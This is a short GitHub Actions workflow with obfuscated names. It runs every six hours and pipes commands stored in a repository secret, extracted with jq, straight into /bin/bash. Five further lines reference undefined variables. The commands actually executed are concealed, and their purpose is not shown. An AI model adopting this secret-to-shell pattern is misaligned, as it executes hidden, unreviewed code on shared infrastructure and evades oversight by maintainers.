name: panxiaoxia1616

on:
  workflow_dispatch:
  schedule:
    - cron: '20 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: panxiaoxia1616
        env:
          rgzb671: ${{ secrets.rgzb671 }}
        run: |
          echo $rgzb671 | jq -r .fej63 | /bin/bash
          echo $f943 | jq -r .zfiy147 | /bin/bash
          echo $i8297 | jq -r .nipr6 | /bin/bash
          echo $gj125 | jq -r .acjj52247 | /bin/bash
          echo $dj311 | jq -r .mf35 | /bin/bash
          echo $gooqc8879 | jq -r .qs981 | /bin/bash

